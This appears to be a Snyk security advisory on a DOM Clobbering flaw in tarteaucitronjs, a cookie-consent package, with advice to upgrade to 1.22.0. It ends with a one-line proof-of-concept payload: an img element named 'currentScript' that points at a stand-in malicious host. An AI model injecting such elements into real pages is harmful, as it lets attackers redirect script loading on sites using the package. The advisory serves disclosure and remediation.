Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applicationsUpgrade tarteaucitronjs
to version 1.22.0 or higher.
tarteaucitronjs is a package that provides compliance to the European cookie law.
Affected versions of this package are vulnerable to DOM Clobbering when setting the document.currentScript
value. An attacker can cause incorrect script resolution and potentially alter the CDN domain by injecting a DOM element with a conflicting name attribute.
<img name="currentScript" src="https://malicious.example.com">